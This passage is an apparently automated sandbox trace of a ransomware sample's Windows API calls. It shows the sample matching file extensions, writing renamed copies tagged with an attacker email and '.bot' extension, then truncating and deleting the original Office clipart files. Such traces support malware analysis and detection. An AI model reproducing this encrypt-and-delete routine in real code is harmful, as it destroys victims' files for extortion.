	[0159.716] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106146.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106146.wmf")) returned 1
	[0159.717] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106146.WMF") returned 63
	[0159.717] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106146.WMF") returned 63
	[0159.717] lstrlenW (lpString=".doc") returned 4
	[0159.717] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.717] lstrlenW (lpString=".docx") returned 5
	[0159.717] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0159.717] lstrlenW (lpString=".pdf") returned 4
	[0159.717] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.717] lstrlenW (lpString=".xls") returned 4
	[0159.717] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.717] lstrlenW (lpString=".xlsx") returned 5
	[0159.717] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0159.717] lstrlenW (lpString=".ppt") returned 4
	[0159.717] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.717] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106146.WMF") returned 63
	[0159.717] lstrlenW (lpString=".zip") returned 4
	[0159.718] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.718] lstrlenW (lpString=".rar") returned 4
	[0159.718] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.718] lstrlenW (lpString=".bz2") returned 4
	[0159.718] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.718] lstrlenW (lpString=".7z") returned 3
	[0159.718] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106146.WMF") returned 63
	[0159.718] lstrlenW (lpString=".dbf") returned 4
	[0159.718] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106146.WMF") returned 63
	[0159.718] lstrlenW (lpString=".1cd") returned 4
	[0159.718] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106146.WMF") returned 63
	[0159.718] lstrlenW (lpString=".jpg") returned 4
	[0159.718] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106146.WMF") returned 63
	[0159.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106146.WMF") returned 63
	[0159.718] lstrlenW (lpString=".doc") returned 4
	[0159.718] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.718] lstrlenW (lpString=".docx") returned 5
	[0159.718] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0159.718] lstrlenW (lpString=".pdf") returned 4
	[0159.718] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.718] lstrlenW (lpString=".xls") returned 4
	[0159.718] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.718] lstrlenW (lpString=".xlsx") returned 5
	[0159.718] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0159.718] lstrlenW (lpString=".ppt") returned 4
	[0159.718] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106146.WMF") returned 63
	[0159.719] lstrlenW (lpString=".zip") returned 4
	[0159.719] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.719] lstrlenW (lpString=".rar") returned 4
	[0159.719] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.719] lstrlenW (lpString=".bz2") returned 4
	[0159.719] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.719] lstrlenW (lpString=".7z") returned 3
	[0159.719] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106146.WMF") returned 63
	[0159.719] lstrlenW (lpString=".dbf") returned 4
	[0159.719] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106146.WMF") returned 63
	[0159.719] lstrlenW (lpString=".1cd") returned 4
	[0159.719] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106146.WMF") returned 63
	[0159.719] lstrlenW (lpString=".jpg") returned 4
	[0159.719] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.719] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0159.719] lstrlenW (lpString="J0107024.WMF") returned 12
	[0159.719] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107024.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107024.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0159.749] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=3020) returned 1
	[0159.749] CloseHandle (hObject=0x3d0) returned 1
	[0159.749] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107024.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107024.wmf")) returned 0x20
	[0159.757] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107024.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107024.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.776] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107024.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107024.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.776] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.776] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.776] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107024.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107024.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0159.777] GetLastError () returned 0x0
	[0159.777] ReadFile (in: hFile=0x1b4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0xbcc, lpOverlapped=0x0) returned 1
	[0159.788] WriteFile (in: hFile=0x3f0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xbd0, lpOverlapped=0x0) returned 1
	[0159.789] ReadFile (in: hFile=0x1b4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.789] WriteFile (in: hFile=0x3f0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0159.789] SetEndOfFile (hFile=0x3f0) returned 1
	[0159.789] CloseHandle (hObject=0x3f0) returned 1
	[0159.789] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.789] SetEndOfFile (hFile=0x1b4) returned 1
	[0159.793] CloseHandle (hObject=0x1b4) returned 1
	[0159.794] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107024.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.932] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107024.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107024.wmf")) returned 1
	[0159.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107024.WMF") returned 63
	[0159.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107024.WMF") returned 63
	[0159.932] lstrlenW (lpString=".doc") returned 4
	[0159.933] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.933] lstrlenW (lpString=".docx") returned 5
	[0159.933] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0159.933] lstrlenW (lpString=".pdf") returned 4
	[0159.933] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.933] lstrlenW (lpString=".xls") returned 4
	[0159.933] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.933] lstrlenW (lpString=".xlsx") returned 5
	[0159.933] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0159.933] lstrlenW (lpString=".ppt") returned 4
	[0159.933] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107024.WMF") returned 63
	[0159.933] lstrlenW (lpString=".zip") returned 4
	[0159.933] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.933] lstrlenW (lpString=".rar") returned 4
	[0159.933] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.933] lstrlenW (lpString=".bz2") returned 4
	[0159.933] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.933] lstrlenW (lpString=".7z") returned 3
	[0159.933] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107024.WMF") returned 63
	[0159.933] lstrlenW (lpString=".dbf") returned 4
	[0159.933] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107024.WMF") returned 63
	[0159.933] lstrlenW (lpString=".1cd") returned 4
	[0159.933] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107024.WMF") returned 63
	[0159.933] lstrlenW (lpString=".jpg") returned 4
	[0159.933] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107024.WMF") returned 63
	[0159.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107024.WMF") returned 63
	[0159.934] lstrlenW (lpString=".doc") returned 4
	[0159.934] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.934] lstrlenW (lpString=".docx") returned 5
	[0159.934] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0159.934] lstrlenW (lpString=".pdf") returned 4
	[0159.934] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.934] lstrlenW (lpString=".xls") returned 4
	[0159.934] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.934] lstrlenW (lpString=".xlsx") returned 5
	[0159.934] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0159.934] lstrlenW (lpString=".ppt") returned 4
	[0159.934] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107024.WMF") returned 63
	[0159.934] lstrlenW (lpString=".zip") returned 4
	[0159.934] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.934] lstrlenW (lpString=".rar") returned 4
	[0159.934] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.934] lstrlenW (lpString=".bz2") returned 4
	[0159.934] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.934] lstrlenW (lpString=".7z") returned 3
	[0159.934] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107024.WMF") returned 63
	[0159.934] lstrlenW (lpString=".dbf") returned 4
	[0159.934] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107024.WMF") returned 63
	[0159.934] lstrlenW (lpString=".1cd") returned 4
	[0159.934] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107024.WMF") returned 63
	[0159.934] lstrlenW (lpString=".jpg") returned 4
	[0159.934] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.935] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0159.935] lstrlenW (lpString="J0107042.WMF") returned 12
	[0159.935] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107042.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107042.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0159.940] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=9048) returned 1
	[0159.940] CloseHandle (hObject=0x25c) returned 1
	[0159.940] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107042.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107042.wmf")) returned 0x20
	[0159.947] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107042.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107042.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.948] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107042.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107042.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0159.948] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.948] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.948] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107042.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107042.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0159.999] GetLastError () returned 0x0
	[0159.999] ReadFile (in: hFile=0x37c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x2358, lpOverlapped=0x0) returned 1
	[0160.022] WriteFile (in: hFile=0x3d8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x2360, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x2360, lpOverlapped=0x0) returned 1
	[0160.023] ReadFile (in: hFile=0x37c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.023] WriteFile (in: hFile=0x3d8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0160.023] SetEndOfFile (hFile=0x3d8) returned 1
	[0160.023] CloseHandle (hObject=0x3d8) returned 1
	[0160.023] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.023] SetEndOfFile (hFile=0x37c) returned 1
	[0160.025] CloseHandle (hObject=0x37c) returned 1
	[0160.025] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107042.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.025] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107042.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107042.wmf")) returned 1
	[0160.026] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107042.WMF") returned 63
	[0160.026] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107042.WMF") returned 63
	[0160.026] lstrlenW (lpString=".doc") returned 4
	[0160.026] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0160.026] lstrlenW (lpString=".docx") returned 5
	[0160.026] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0160.026] lstrlenW (lpString=".pdf") returned 4
	[0160.026] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0160.026] lstrlenW (lpString=".xls") returned 4
	[0160.026] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0160.026] lstrlenW (lpString=".xlsx") returned 5
	[0160.026] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0160.026] lstrlenW (lpString=".ppt") returned 4
	[0160.026] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0160.026] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107042.WMF") returned 63
	[0160.026] lstrlenW (lpString=".zip") returned 4
	[0160.027] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0160.027] lstrlenW (lpString=".rar") returned 4
	[0160.027] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0160.027] lstrlenW (lpString=".bz2") returned 4
	[0160.027] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0160.027] lstrlenW (lpString=".7z") returned 3
	[0160.027] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0160.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107042.WMF") returned 63
	[0160.027] lstrlenW (lpString=".dbf") returned 4
	[0160.027] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0160.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107042.WMF") returned 63
	[0160.027] lstrlenW (lpString=".1cd") returned 4
	[0160.027] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0160.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107042.WMF") returned 63
	[0160.027] lstrlenW (lpString=".jpg") returned 4
	[0160.027] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0160.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107042.WMF") returned 63
	[0160.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107042.WMF") returned 63
	[0160.027] lstrlenW (lpString=".doc") returned 4
	[0160.027] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0160.027] lstrlenW (lpString=".docx") returned 5
	[0160.027] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0160.027] lstrlenW (lpString=".pdf") returned 4
	[0160.027] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0160.027] lstrlenW (lpString=".xls") returned 4
	[0160.027] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0160.027] lstrlenW (lpString=".xlsx") returned 5
	[0160.027] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0160.027] lstrlenW (lpString=".ppt") returned 4
	[0160.027] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0160.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107042.WMF") returned 63
	[0160.027] lstrlenW (lpString=".zip") returned 4
	[0160.028] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0160.028] lstrlenW (lpString=".rar") returned 4
	[0160.028] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0160.028] lstrlenW (lpString=".bz2") returned 4
	[0160.028] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0160.028] lstrlenW (lpString=".7z") returned 3
	[0160.028] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0160.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107042.WMF") returned 63
	[0160.028] lstrlenW (lpString=".dbf") returned 4
	[0160.028] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0160.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107042.WMF") returned 63
	[0160.028] lstrlenW (lpString=".1cd") returned 4
	[0160.028] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0160.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107042.WMF") returned 63
	[0160.028] lstrlenW (lpString=".jpg") returned 4
	[0160.028] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0160.028] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0160.028] lstrlenW (lpString="J0107134.WMF") returned 12
	[0160.028] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107134.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107134.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0160.029] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=48388) returned 1
	[0160.029] CloseHandle (hObject=0x37c) returned 1
	[0160.029] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107134.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107134.wmf")) returned 0x20
	[0160.029] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107134.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107134.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0160.029] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107134.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107134.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0160.029] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.029] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.029] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107134.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107134.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0160.030] GetLastError () returned 0x0
	[0160.030] ReadFile (in: hFile=0x37c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0xbd04, lpOverlapped=0x0) returned 1
	[0160.055] WriteFile (in: hFile=0x3d8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xbd10, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xbd10, lpOverlapped=0x0) returned 1
	[0160.056] ReadFile (in: hFile=0x37c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.056] WriteFile (in: hFile=0x3d8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0160.056] SetEndOfFile (hFile=0x3d8) returned 1
	[0160.057] CloseHandle (hObject=0x3d8) returned 1
	[0160.057] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.057] SetEndOfFile (hFile=0x37c) returned 1
	[0160.059] CloseHandle (hObject=0x37c) returned 1
	[0160.059] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107134.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.066] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107134.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107134.wmf")) returned 1
	[0160.077] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107134.WMF") returned 63
	[0160.077] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107134.WMF") returned 63
